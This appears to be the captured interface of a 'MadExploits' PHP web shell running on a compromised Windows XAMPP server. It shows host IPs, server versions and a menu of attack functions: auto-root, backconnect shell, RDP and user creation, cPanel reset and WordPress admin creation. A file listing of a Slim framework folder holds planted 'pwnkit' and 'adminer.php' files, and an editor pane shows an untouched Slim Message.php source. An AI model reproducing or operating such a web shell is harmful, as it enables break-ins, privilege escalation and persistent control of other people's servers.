Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.51
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
slim /
psr7 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Factory
[ DIR ]
drwxrwxrwx
Interfaces
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Cookies.php
5.27
KB
-rw-rw-rw-
Environment.php
1.51
KB
-rw-rw-rw-
Header.php
1.9
KB
-rw-rw-rw-
Headers.php
8.68
KB
-rw-rw-rw-
Message.php
3.8
KB
-rw-rw-rw-
NonBufferedBody.php
2.45
KB
-rw-rw-rw-
Request.php
8.38
KB
-rw-rw-rw-
Response.php
8.5
KB
-rw-rw-rw-
Stream.php
8.98
KB
-rw-rw-rw-
UploadedFile.php
8.34
KB
-rw-rw-rw-
Uri.php
11.22
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Message.php
<?php /** * Slim Framework (https://slimframework.com) * * @license https://github.com/slimphp/Slim-Psr7/blob/master/LICENSE.md (MIT License) */ declare(strict_types=1); namespace Slim\Psr7; use InvalidArgumentException; use Psr\Http\Message\MessageInterface; use Psr\Http\Message\StreamInterface; use Slim\Psr7\Interfaces\HeadersInterface; use function array_keys; use function header; use function header_remove; use function implode; use function sprintf; abstract class Message implements MessageInterface { /** * @var string */ protected $protocolVersion = '1.1'; /** * @var array */ protected static $validProtocolVersions = [ '1.0' => true, '1.1' => true, '2.0' => true, '2' => true, ]; /** * @var HeadersInterface */ protected $headers; /** * @var StreamInterface */ protected $body; /** * Disable magic setter to ensure immutability * * @param string $name The property name * @param mixed $value The property value * * @return void */ public function __set($name, $value): void { // Do nothing } /** * {@inheritdoc} */ public function getProtocolVersion(): string { return $this->protocolVersion; } /** * @return static * {@inheritdoc} */ public function withProtocolVersion($version) { if (!isset(self::$validProtocolVersions[$version])) { throw new InvalidArgumentException( 'Invalid HTTP version. Must be one of: ' . implode(', ', array_keys(self::$validProtocolVersions)) ); } $clone = clone $this; $clone->protocolVersion = $version; return $clone; } /** * {@inheritdoc} */ public function getHeaders(): array { return $this->headers->getHeaders(true); } /** * {@inheritdoc} */ public function hasHeader($name): bool { return $this->headers->hasHeader($name); } /** * {@inheritdoc} */ public function getHeader($name): array { return $this->headers->getHeader($name); } /** * {@inheritdoc} */ public function getHeaderLine($name): string { $values = $this->headers->getHeader($name); return implode(',', $values); } /** * @return static * {@inheritdoc} */ public function withHeader($name, $value) { $clone = clone $this; $clone->headers->setHeader($name, $value); if ($this instanceof Response && $this->body instanceof NonBufferedBody) { header(sprintf('%s: %s', $name, $clone->getHeaderLine($name))); } return $clone; } /** * @return static * {@inheritdoc} */ public function withAddedHeader($name, $value) { $clone = clone $this; $clone->headers->addHeader($name, $value); if ($this instanceof Response && $this->body instanceof NonBufferedBody) { header(sprintf('%s: %s', $name, $clone->getHeaderLine($name))); } return $clone; } /** * @return static * {@inheritdoc} */ public function withoutHeader($name) { $clone = clone $this; $clone->headers->removeHeader($name); if ($this instanceof Response && $this->body instanceof NonBufferedBody) { header_remove($name); } return $clone; } /** * {@inheritdoc} */ public function getBody(): StreamInterface { return $this->body; } /** * @return static * {@inheritdoc} */ public function withBody(StreamInterface $body) { $clone = clone $this; $clone->body = $body; return $clone; } }
Close